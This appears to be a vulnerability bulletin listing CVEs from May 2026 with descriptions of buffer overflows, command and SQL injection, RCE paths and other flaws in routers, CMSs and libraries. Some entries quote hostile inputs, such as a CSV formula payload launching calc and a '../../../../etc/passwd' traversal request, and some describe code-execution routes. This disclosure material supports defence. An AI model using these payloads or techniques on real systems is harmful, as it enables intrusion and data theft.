https://talosintelligence.com/vulnerability_reports/ |
| GeoVision Inc.--GV-VMS V20.0.2 | A stack overflow vulnerability exists in the WebCam Server Login functionality of GeoVision GV-VMS V20 20.0.2. A specially crafted HTTP request can lead to an arbitrary code execution. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. #### Stack-overflow via unconstrained sscanf The call to `sscanf` at [1] to split the `Buffer` variable into the `username` and `password` variables doesn't limit the size of the extracted content to match the destination buffers' sizes. In this case, if either the username or password decoded from the authorization string exceeds `40` characters (the size the stack variables `username` and `password`) then a stack overflow will occur. The data is controlled by an attacker, but sronger constraints (e.g. no null bytes) may make exploitation harder. A successful attack could lead to full code execution as SYSTEM on the machine running the service. | 2026-05-04 | 9 | CVE-2026-7372 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| Yarbo--Firmware | Yarbo firmware v2.3.9 contains hardcoded administrative credentials embedded in the firmware image. These credentials are identical across all devices running this firmware and cannot be changed or removed by end users, enabling trivial unauthorized access to device management interfaces by anyone who knows them. | 2026-05-07 | 9.8 | CVE-2026-7414 | https://github.com/Bin4ry/yarbo-nat-in-my-back-yard https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001111111111100011111111111000000000000000000000000000000000000000000000000000001000 |
| Yarbo--Firmware | The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind. | 2026-05-07 | 9.8 | CVE-2026-7415 | https://github.com/Bin4ry/yarbo-nat-in-my-back-yard https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000000111111111100111111111110000000000000000000000000000000000000000000000000000001001 |
| ollama--ollama | Ollama before 0.17.1 contains a heap out-of-bounds read vulnerability in the GGUF model loader. The /api/create endpoint accepts an attacker-supplied GGUF file in which the declared tensor offset and size exceed the file's actual length; during quantization in fs/ggml/gguf.go and server/quantization.go (WriteTo()), the server reads past the allocated heap buffer. The leaked memory contents may include environment variables, API keys, system prompts, and concurrent users' conversation data, and can be exfiltrated by uploading the resulting model artifact through the /api/push endpoint to an attacker-controlled registry. The /api/create and /api/push endpoints have no authentication in the upstream distribution. Default deployments bind to 127.0.0.1, but the documented OLLAMA_HOST=0.0.0.0 configuration is widely used in practice (large public-internet exposure observed). | 2026-05-04 | 9.1 | CVE-2026-7482 | ollama/ollama PR #14406 — ggml: ensure tensor size is valid (fix) Fix commit 88d57d0 ollama v0.17.1 release notes |
| Totolink--WA300 | A security flaw has been discovered in Totolink WA300 5.2cu.7112_B20190227. The affected element is the function loginauth of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument http_host results in buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-04 | 9.8 | CVE-2026-7719 | VDB-360895 | Totolink WA300 POST Request cstecgi.cgi loginauth buffer overflow VDB-360895 | CTI Indicators (IOB, IOC, IOA) Submit #807197 | Totolink WA300 WA300 V5.2cu.7112_B20190227 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-loginAuth-34553a41781f8050b8ffc9e90a103cd5 https://www.totolink.net/ |
| Totolink--N300RH | A security flaw has been discovered in Totolink N300RH 3.2.4-B20220812. Affected by this vulnerability is the function loginauth of the file /cgi-bin/cstecgi.cgi of the component Parameter Handler. Performing a manipulation of the argument Password results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-04 | 9.8 | CVE-2026-7747 | VDB-360922 | Totolink N300RH Parameter cstecgi.cgi loginauth buffer overflow VDB-360922 | CTI Indicators (IOB, IOC, IOA) Submit #807201 | Totolink N300RH N300RH V3_Firmware V3.2.4-B20220812 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-loginauth_password-34553a41781f80c0ad36f4d95122fd40?pvs=73 https://www.totolink.net/ |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setAppFilterCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument enable results in os command injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-05 | 9.8 | CVE-2026-7823 | VDB-361075 | Totolink A8000RU cstecgi.cgi setAppFilterCfg os command injection VDB-361075 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807775 | Totolink A8000RU 7.1cu.643_b20200521 Command Injection https://github.com/Litengzheng/vuldb_new2/blob/main/A8000RU/vul_330/README.md https://www.totolink.net/ |
| EFM--ipTIME NAS1dual | A security vulnerability has been detected in EFM ipTIME NAS1dual 1.5.24. This issue affects the function get_csrf_whites of the file /cgi/advanced/misc_main.cgi. Such manipulation leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-05 | 9.8 | CVE-2026-7834 | VDB-361113 | EFM ipTIME NAS1dual misc_main.cgi get_csrf_whites stack-based overflow VDB-361113 | CTI Indicators (IOB, IOC, IOA) Submit #807787 | iptime nas1dual 1.5.24 Stack Overflow https://github.com/glkfc/IoT-Vulnerability/blob/main/iptime/nas1dual/iptime2_en.md |
| D-Link--DI-8100 | A weakness has been identified in D-Link DI-8100 16.07.26A1. Affected is the function sprintf of the file /auto_reboot.asp of the component HTTP Handler. This manipulation of the argument enable/time causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-05 | 9.8 | CVE-2026-7853 | VDB-361130 | D-Link DI-8100 HTTP auto_reboot.asp sprintf buffer overflow VDB-361130 | CTI Indicators (IOB, IOC, IOA) Submit #807837 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/auto_reboot_asp_overflow.md https://www.dlink.com/ |
| D-Link--DI-8100 | A security vulnerability has been detected in D-Link DI-8100 16.07.26A1. Affected by this vulnerability is the function url_rule_asp of the file /url_rule.asp of the component POST Parameter Handler. Such manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-05-05 | 9.8 | CVE-2026-7854 | VDB-361131 | D-Link DI-8100 POST Parameter url_rule.asp url_rule_asp buffer overflow VDB-361131 | CTI Indicators (IOB, IOC, IOA) Submit #807838 | D-Link DI-8100 16.07.26A1 Denial of Service https://github.com/draw-ctf/report/blob/main/DI-8100/url_rule_asp_overflow.md https://www.dlink.com/ |
| Universal Robots--PolyScope 5 | OS command injection in Dashboard Server interface in Universal Robots PolyScope versions prior to 5.25.1 allows unauthenticated attacker to craft commands that will execute code on the robot's OS. | 2026-05-08 | 9.8 | CVE-2026-8153 | https://www.universal-robots.com/developer/communication-protocol/dashboard-server/ |
| opencartextensions--Extension TMD Vendor System | Opencart TMD Vendor System 3.x contains a blind SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting SQL code through the product_id parameter. Attackers can craft malicious SQL queries using time-based or content-based blind injection techniques to enumerate usernames, emails, and password reset codes from the oc_user table. | 2026-05-10 | 8.2 | CVE-2021-47928 | ExploitDB-50493 Official Product Homepage Product Reference VulnCheck Advisory: Opencart TMD Vendor System 3.x Blind SQL Injection via product route |
| Balbooa--Balbooa Joomla Forms Builder | Balbooa Joomla Forms Builder 2.0.6 contains an unauthenticated SQL injection vulnerability in the form submission handler that allows remote attackers to execute arbitrary SQL queries. Attackers can send POST requests to the com_baforms component with malicious JSON payloads in the 'id' field parameter to extract sensitive database information. | 2026-05-10 | 8.2 | CVE-2021-47930 | ExploitDB-50447 Official Product Homepage VulnCheck Advisory: Balbooa Joomla Forms Builder 2.0.6 SQL Injection Unauthenticated |
| Sentry--Sentry | Sentry 8.2.0 contains a remote code execution vulnerability that allows authenticated superusers to execute arbitrary commands by injecting malicious pickle-serialized objects through the audit log entry data parameter. Attackers can submit crafted POST requests to the admin audit log endpoint with base64-encoded compressed pickle payloads in the data field to achieve code execution with application privileges. | 2026-05-10 | 8.8 | CVE-2021-47935 | ExploitDB-50318 Product Reference VulnCheck Advisory: Sentry 8.2.0 Remote Code Execution via Pickle Deserialization |
| E107--e107 CMS | e107 CMS 2.3.0 contains a remote code execution vulnerability that allows authenticated users with theme installation permissions to execute arbitrary commands by uploading malicious theme files. Attackers can upload a crafted theme package through the theme.php endpoint that deploys a web shell to the e107_themes directory, then execute system commands via the payload.php script. | 2026-05-10 | 8.8 | CVE-2021-47937 | ExploitDB-50315 Official Product Homepage Product Reference VulnCheck Advisory: e107 CMS 2.3.0 Authenticated Remote Code Execution via Theme Upload |
| Impresscms--ImpressCMS | ImpressCMS 1.4.2 contains a remote code execution vulnerability in the autotasks administrative interface that allows authenticated attackers to execute arbitrary PHP code by injecting malicious code into the sat_code parameter. Attackers can authenticate, submit a POST request to /modules/system/admin.php?fct=autotasks&op=mod with crafted sat_code containing PHP commands, which creates an executable file that accepts arbitrary commands via GET parameters. | 2026-05-10 | 8.8 | CVE-2021-47938 | ExploitDB-50298 Official Product Homepage Product Reference VulnCheck Advisory: ImpressCMS 1.4.2 Remote Code Execution via Autotasks |
| Evo--Evolution CMS | Evolution CMS 3.1.6 contains a remote code execution vulnerability that allows authenticated users with module creation permissions to execute arbitrary system commands by injecting PHP code into module parameters. Attackers can send POST requests to /manager/index.php with malicious PHP code in the 'post' parameter to create modules that execute arbitrary commands when invoked. | 2026-05-10 | 8.8 | CVE-2021-47939 | ExploitDB-50296 Official Product Homepage Product Reference VulnCheck Advisory: Evolution CMS 3.1.6 Authenticated Remote Code Execution via Module Creation |
| Modalsurvey--Survey & Poll | WordPress Plugin Survey & Poll 1.5.7.3 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the wp_sap cookie parameter. Attackers can craft SQL payloads in the cookie to extract sensitive database information including usernames, passwords, and other confidential data from the WordPress database. | 2026-05-10 | 8.2 | CVE-2021-47941 | ExploitDB-50269 Official Product Homepage VulnCheck Advisory: WordPress Plugin Survey & Poll 1.5.7.3 SQL Injection via sss_params |
| Textpattern--TextPattern CMS | TextPattern CMS 4.8.7 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by uploading malicious PHP files through the file upload functionality. Attackers can upload a PHP shell via the Files section in the content area and execute commands by accessing the uploaded file at /textpattern/files/ with GET parameters passed to the system function. | 2026-05-10 | 8.8 | CVE-2021-47943 | ExploitDB-49996 ExploitDB-50415 VulnCheck Advisory: TextPattern CMS 4.8.7 Remote Code Execution via File Upload |
| Cyberpanel--CyberPanel | CyberPanel 2.1 contains a command execution vulnerability that allows authenticated attackers to read arbitrary files and execute remote code by exploiting symlink attacks through the filemanager controller endpoint. Attackers can manipulate the completeStartingPath parameter in POST requests to /filemanager/controller to create symbolic links, read sensitive files like database credentials, and execute arbitrary shell commands through the /websites/fetchFolderDetails endpoint. | 2026-05-10 | 8.8 | CVE-2021-47949 | ExploitDB-50230 Official Product Homepage Product Reference VulnCheck Advisory: CyberPanel 2.1 Authenticated Remote Code Execution via Symlink Attack |
| MegaTKC--Aero CMS | Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server. | 2026-05-10 | 8.8 | CVE-2022-50944 | ExploitDB-51085 Official Product Homepage VulnCheck Advisory: Aero CMS 0.0.1 PHP Code Injection via posts.php |
| DrayTek--Vigor 2960 | DrayTek Vigor 2960 firmware versions prior to 1.5.1.4 contain an OS command injection vulnerability in the CGI login handler that allows unauthenticated remote attackers to execute arbitrary commands by injecting shell metacharacters into the formpassword parameter. Attackers can exploit unsanitized input passed to the otp_check.sh script to achieve remote code execution with web server privileges. Exploitation requires knowledge of a valid username and that the target account has MOTP authentication enabled. | 2026-05-08 | 8.1 | CVE-2022-50994 | https://www.draytek.co.uk/support/downloads/vigor-2960/older-firmware/firmware-1514?task=download.send&id=2597:readme-v2960-1514&catid=1251 https://www.draytek.com/about/newsroom/2021/2021/end-of-life-notification-vigor2960 https://www.vulncheck.com/advisories/draytek-vigor-2960-os-command-injection-via-mainfunction-cgi |
| Erpnext--Frappe Framework (ERPNext) | Frappe Framework ERPNext 13.4.0 contains a sandbox escape vulnerability in RestrictedPython that allows authenticated users with System Manager role to execute arbitrary code by exploiting frame introspection. Attackers can create a server script via the /app/server-script endpoint and access the gi_frame attribute to traverse the call stack and invoke os.popen to execute system commands. | 2026-05-05 | 8.8 | CVE-2023-54345 | ExploitDB-51580 Official Product Homepage Product Reference Reference Source Code Repository Reference Source Code Repository VulnCheck Advisory: Frappe Framework ERPNext 13.4.0 Remote Code Execution |
| Rajodiya--ERPGo SaaS | ERPGo SaaS 3.9 contains a CSV injection vulnerability that allows authenticated attackers to execute arbitrary code by injecting formula payloads into vendor name fields. Attackers can add malicious formulas like =10+20+cmd|' /C calc'!A0 in the vendor creation form, which execute when the exported CSV file is opened in spreadsheet applications. | 2026-05-05 | 8.8 | CVE-2023-54348 | ExploitDB-51220 Official Product Homepage Product Reference VulnCheck Advisory: ERPGo SaaS 3.9 CSV Injection via Vendor Creation |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SX) is affected by a Broken Access Control vulnerability leading to privilege escalation. This could allow unauthorized users to gain elevated privileges, bypassing intended access restrictions. This may result in exposure of sensitive data or unauthorized system modifications | 2026-05-06 | 8.3 | CVE-2024-30151 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127782 |
| PHOENIX CONTACT--FL MGUARD 2102 | A low privileged remote attacker can gain the root password due to improper removal of sensitive information before storage or transfer. | 2026-05-07 | 8 | CVE-2024-43384 | https://certvde.com/en/advisories/VDE-2024-039 |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Improperly controlled modification of Dynamically-Determined object attributes, Allocation of resources without limits or throttling vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Excessive Allocation, Flooding. This issue affects DivvyDrive: from 4.8.2.19 before 4.8.3.2. | 2026-05-07 | 8.3 | CVE-2025-14341 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| Hitachi--Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900 | Remote Code Execution Vulnerability in Hitachi Storage Navigator and the maintenance console in Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28. This issue affects Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28 : before DKCMAIN Ver. 88-08-16-xx/00, SVP Ver. 88-08-18-xx/00, before DKCMAIN Ver. 93-07-26-xx/00, SVP Ver. 93-07-26-xx/00, before DKCMAIN Ver. A3-04-02-xx/00, MPC Ver. A3-04-02-xx/00, before DKCMAIN Ver. A3-03-41-xx/00, MPC Ver. A3-03-41-xx/00, before DKCMAIN Ver. A3-03-03-xx/00, MPC Ver. A3-03-03-xx/00. | 2026-05-07 | 8.3 | CVE-2025-1978 | https://www.hitachi.com/products/it/storage-solutions/sec_info/2026/2026_307.html |
| HCL--BigFix RunBookAI | HCL BigFix RunBookAI is affected by a Unvalidated Command Input / Potential Command Smuggling vulnerability. A flaw in a component's input handling was identified that could permit unauthorized command execution. | 2026-05-06 | 8.8 | CVE-2025-31951 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130444 |
| Gen Digital--Norton Secure VPN | A privilege escalation vulnerability exists during the installation of Norton Secure VPN via the Microsoft Store. A low-privilege user can replace files during the installation process, which may result in deletion of arbitrary files that can lead to elevation of privileges. | 2026-05-04 | 8.8 | CVE-2025-58074 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2276 |
| Apache Software Foundation--Apache CloudStack | Missing MinIO policy cleanup on bucket deletion via Apache CloudStack allows users to retain access to buckets which they previously owned. If another user creates a new bucket with the same name, the previous owners can gain unauthorized read and write access to it by using the previously generated access and secret keys. Users are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue. | 2026-05-08 | 8 | CVE-2025-66467 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Hitachi--Hitachi Virtual Storage Platform One Block 23 | OS command injection vulneravility in the management gui (maintenance utility) of Hitachi Virtual Storage Platform One Block 23, 24, 26 and 28. This issue affects Hitachi Virtual Storage Platform One Block 23/24/26/28: before DKCMAIN A3-04-21-40/00, ESM A3-04-21/00. | 2026-05-07 | 8.1 | CVE-2025-9661 | https://www.hitachi.com/products/it/storage-solutions/sec_info/2026/2026_309.html |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to execute arbitrary code as root, possibly resulting in the complete compromise of a targeted device. To exploit this vulnerability, the attacker must have valid user credentials on the affected device. | 2026-05-06 | 8.8 | CVE-2026-20034 | cisco-sa-unity-rce-ssrf-hENhuASy |
| vda-linux--busybox_mirror | BusyBox before commit 42202bf contains a heap buffer overflow vulnerability in the DHCPv6 client (udhcpc6) DNS_SERVERS option handler in networking/udhcp/d6_dhcpc.c that allows network-adjacent attackers to trigger memory corruption by sending a crafted DHCPv6 response with a malformed D6_OPT_DNS_SERVERS option. Attackers can exploit incorrect heap buffer allocation calculations in the option_to_env() function to cause denial of service or achieve arbitrary code execution on embedded systems without heap hardening. | 2026-05-04 | 8.1 | CVE-2026-29004 | https://y637f9qq2x.com/posts/busybox-dhcpv6-heap-overflow/ https://github.com/vda-linux/busybox_mirror/commit/42202bfb1e6ac51fa995beda8be4d7b654aeee2a https://github.com/vda-linux/busybox_mirror/commit/d368f3f7836d1c2484c8f839316e5c93e76d4409 https://busybox.net/ https://www.vulncheck.com/advisories/busybox-dhcpv6-client-heap-buffer-overflow-via-dns-servers |
| netbox-community--netbox | NetBox versions 4.3.5 through 4.5.4 contain a remote code execution vulnerability in the RenderTemplateMixin.get_environment_params() method that allows authenticated users with exporttemplate or configtemplate permissions to execute arbitrary code by specifying malicious Python callables in the environment_params field. Attackers can bypass Jinja2 SandboxedEnvironment protections by setting the finalize parameter to any importable Python callable such as subprocess.getoutput, which is invoked on every rendered expression outside the sandbox's call interception mechanism, achieving remote code execution as the NetBox service user. | 2026-05-04 | 8.8 | CVE-2026-29514 | https://chocapikk.com/posts/2026/netbox-export-template-rce/ https://github.com/netbox-community/netbox/issues/22079 https://github.com/netbox-community/netbox/pull/22078 https://www.vulncheck.com/advisories/netbox-rce-via-rendertemplatemixin |
| Microsoft--Azure Machine Learning | Improper neutralization of input during web page generation ('cross-site scripting') in Azure Machine Learning allows an unauthorized attacker to perform spoofing over a network. | 2026-05-07 | 8.8 | CVE-2026-32207 | Azure Machine Learning Notebook Spoofing Vulnerability |
| Microsoft--Microsoft Partner Center | Externally controlled reference to a resource in another sphere in Microsoft Partner Center allows an unauthorized attacker to perform spoofing over a network. | 2026-05-07 | 8.2 | CVE-2026-34327 | Microsoft Partner Center Spoofing Vulnerability |
| Oracle Corporation--Oracle MCP Server Helper Tool product of Oracle Open Source Projects | Vulnerability in the Oracle MCP Server Helper Tool product of Oracle Open Source Projects (component: helper tool). The supported versions that is affected is 1.0.1-1.0.156. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle MCP Server Helper Tool. Successful attacks of this vulnerability can result in Oracle MCP Server Helper Tool executing malicious SQL. | 2026-05-05 | 8.7 | CVE-2026-35228 | Oracle Advisory |
| Microsoft--Azure AI Foundry | Improper access control in Azure AI Foundry M365 published agents allows an unauthorized attacker to elevate privileges over a network. | 2026-05-07 | 8.6 | CVE-2026-35435 | Azure AI Foundry Elevation of Privilege Vulnerability |
| Gosoft Software Industry and Trade Ltd. Co.--Proticaret E-Commerce | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Gosoft Software Industry and Trade Ltd. Co. Proticaret E-Commerce allows Cross-Site Scripting (XSS), Reflected XSS. This issue affects Proticaret E-Commerce: from v5.0.0 before V 6.0.1767.1383. | 2026-05-07 | 8.8 | CVE-2026-3953 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0180 |
| Microsoft--Azure Monitor Action Group notification system | Server-side request forgery (ssrf) in Azure Notification Service allows an authorized attacker to elevate privileges over a network. | 2026-05-07 | 8.1 | CVE-2026-41105 | Azure Monitor Action Group Notification System Elevation of Privilege Vulnerability |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From versions 3.0.0 to before 3.2.9, 3.3.0 to before 3.3.11, and 3.4.0 to before 3.4.11, there is an integer overflow in ImageChannel::resize that leads to heap OOB write via OpenEXRUtil public API. This issue has been patched in versions 3.2.9, 3.3.11, and 3.4.11. | 2026-05-07 | 8.8 | CVE-2026-41142 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-m25w-72cj-q6mg https://github.com/AcademySoftwareFoundation/openexr/pull/2367 https://github.com/AcademySoftwareFoundation/openexr/commit/0592ee539f33c122c90f09238579b902d838afb4 |
| YesWiki--yeswiki | YesWiki is a wiki system written in PHP. Prior to version 4.6.1, YesWiki bazar module contains a SQL injection vulnerability in tools/bazar/services/EntryManager.php at line 704. The $data['id_fiche'] value (sourced from $_POST['id_fiche']) is concatenated directly into a raw SQL query without any sanitization or parameterization. This issue has been patched in version 4.6.1. | 2026-05-07 | 8.8 | CVE-2026-41143 | https://github.com/YesWiki/yeswiki/security/advisories/GHSA-f58v-p6j9-24c2 https://github.com/YesWiki/yeswiki/releases/tag/v4.6.1 |
| daptin--daptin | Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.4, the /aggregate/:typename endpoint accepted column and group query parameters that were passed verbatim to goqu.L() - a raw SQL literal expression builder - without any validation. This bypassed all parameterization and allowed authenticated users with any valid session to inject arbitrary SQL expressions. This issue has been patched in version 0.11.4. | 2026-05-07 | 8.3 | CVE-2026-41422 | https://github.com/daptin/daptin/security/advisories/GHSA-rw2c-8rfq-gwfv https://github.com/daptin/daptin/releases/tag/v0.11.4 |
| dagster-io--dagster | Dagster is an orchestration platform for the development, production, and observation of data assets. Prior to Dagster Core version 1.13.1 and prior to Dagster libraries version 0.29.1, the DuckDB, Snowflake, BigQuery, and DeltaLake I/O managers constructed SQL WHERE clauses by interpolating dynamic partition key values into queries without escaping. A user with the Add Dynamic Partitions permission could create a partition key that injects arbitrary SQL, which would execute against the target database backend under the I/O manager's credentials. Only deployments that use dynamic partitions are affected. Pipelines using static or time-window partitions are not impacted. This issue has been patched in Dagster Core version 1.13.1 and Dagster libraries version 0.29.1. | 2026-05-07 | 8.3 | CVE-2026-41490 | https://github.com/dagster-io/dagster/security/advisories/GHSA-mjw2-v2hm-wj34 https://github.com/dagster-io/dagster/releases/tag/1.13.1 |
| dapr--dapr | Dapr is a portable, event-driven, runtime for building distributed applications across cloud and edge. From versions 1.3.0 to before 1.15.14, 1.16.0-rc.1 to before 1.16.14, and 1.17.0-rc.1 to before 1.17.5, a vulnerability has been found in Dapr that allows bypassing access control policies for service invocation using reserved URL characters and path traversal sequences in method paths. The ACL normalized the method path independently from the dispatch layer, so the ACL evaluated one path while the target application received a different one. This issue has been patched in versions 1.15.14, 1.16.14, and 1.17.5. | 2026-05-08 | 8.1 | CVE-2026-41491 | https://github.com/dapr/dapr/security/advisories/GHSA-85gx-3qv6-4463 https://github.com/dapr/dapr/pull/9589 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.9 and praisonaiagents version 1.6.9, the fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends - MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB - pass table_prefix straight into f-string SQL. Same root cause, same code pattern, same exploitation. 52 unvalidated injection points across the codebase. postgres.py additionally accepts an unvalidated schema parameter used directly in DDL. This issue has been patched in praisonai version 4.6.9 and praisonaiagents version 1.6.9. | 2026-05-08 | 8.1 | CVE-2026-41496 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5 |
| inducer--relate | RELATE is a web-based courseware package. Prior to commit 2f68e16, RELATE is vulnerable to predictable token generation in auth.py's make_sign_in_key() function and exam.py's gen_ticket_code() function. This issue has been patched via commit 2f68e16. | 2026-05-07 | 8.7 | CVE-2026-41505 | https://github.com/inducer/relate/security/advisories/GHSA-rvx5-95mm-p77v https://github.com/inducer/relate/commit/2f68e16cd3b96d25c188c1aa3f7e13cdb15cdaeb |
| Ajax30--BraveCMS-2.0 | Brave CMS is an open-source CMS. Prior to commit 6c56603, page and article body content entered through the CKEditor rich-text editor is stored verbatim in the database and subsequently rendered with Laravel Blade's unescaped output directive {!! !!}. Any JavaScript or HTML injected by an editor-role user is permanently stored and executed in every visitor's browser upon page load. This issue has been patched via commit 6c56603. | 2026-05-08 | 8.7 | CVE-2026-41524 | https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433 https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio SAML Identity Provider implementation discards the return value of its validateSignature() method at both call sites (handleSSORequest() line 418 and handleSLORequest() line 613). The method returns error strings on failure rather than throwing exceptions, but the developer believed it would throw (per comments on lines 416 and 611). This means the smc_require_auth_signed configuration option is completely ineffective - unsigned or invalidly-signed SAML AuthnRequests and LogoutRequests are processed identically to properly signed ones. This issue has been patched in version 5.0.9. | 2026-05-07 | 8.2 | CVE-2026-41669 | https://github.com/Admidio/admidio/security/advisories/GHSA-25cw-98hg-g3cg https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the SAML IdP implementation in Admidio's SSO module uses the AssertionConsumerServiceURL value directly from incoming SAML AuthnRequest messages as the destination for the SAML response, without validating it against the registered ACS URL (smc_acs_url) stored in the database for the corresponding service provider client. An attacker who knows the Entity ID of a registered SP client can craft a SAML AuthnRequest with an arbitrary AssertionConsumerServiceURL, causing the IdP to send the signed SAML response -- containing user identity attributes (login name, email, roles, profile fields) -- to an attacker-controlled URL. This issue has been patched in version 5.0.9. | 2026-05-07 | 8.2 | CVE-2026-41670 | https://github.com/Admidio/admidio/security/advisories/GHSA-p9w9-87c8-m235 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| i18next--i18next-http-middleware | i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware wrote user-controlled language values into the Content-Language response header after passing them through utils.escape(), which is an HTML-entity encoder that does not strip carriage return, line feed, or other control characters. When the application used an older i18next (< 19.5.0) that still exercised the backward-compatibility fallback at LanguageDetector.js:100 or otherwise produced a raw detected value, CRLF sequences in the attacker-controlled lng parameter reached res.setHeader('Content-Language', ...) verbatim. This issue has been patched in version 3.9.3. | 2026-05-08 | 8.6 | CVE-2026-41683 | https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg |
| i18next--i18next-http-middleware | 18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Versions prior to 3.9.3 allow an unauthenticated HTTP client to pollute Object.prototype in the Node.js process hosting the middleware, via two unvalidated entry points that reach internal object-key writes: getResourcesHandler and missingKeyHandler. This can break authorisation checks (if (user.isAdmin) returning true for any user), cause type-confusion DoS, and depending on downstream code it can be chained into RCE. | 2026-05-08 | 8.6 | CVE-2026-41690 | https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw |
| i18next--i18next-fs-backend | i18next-fs-backend is a backend layer for i18next using in Node.js and for Deno to load translations from the filesystem. Prior to version 2.6.4, i18next-fs-backend substitutes the lng and ns options directly into the configured loadPath / addPath templates and then read / write the resulting file from disk. The interpolation is unencoded and unvalidated, so a crafted lng or ns value - containing .., a path separator, a control character, a prototype key, or simply an unexpectedly long string - allows an attacker who can influence either value to read or overwrite files outside the intended locale directory. When lng / ns are derived from untrusted input (request-scoped i18next instances behind an HTTP layer such as i18next-http-middleware, or any framework that lets the end user pick the language via query string, cookie, or header), a single request such as ?lng=../../../../etc/passwd causes the backend to attempt to read that path. This issue has been patched in version 2.6.4. | 2026-05-08 | 8.2 | CVE-2026-41693 | https://github.com/i18next/i18next-fs-backend/security/advisories/GHSA-8847-338w-5hcj |
| Spring--Spring AI | Spring AI's MilvusVectorStore#doDelete(List) implementation is vulnerable to filter-expression injection via unsanitized document IDs. Spring AI 1.0.x: affected from 1.0.0 through latest 1.0.x; upgrade to 1.0.7 or greater. Spring AI 1.1.x: affected from 1.1.0 through latest 1.1.x; upgrade to 1.1.6 or greater. | 2026-05-09 | 8.6 | CVE-2026-41705 | https://spring.io/security/cve-2026-41705 |
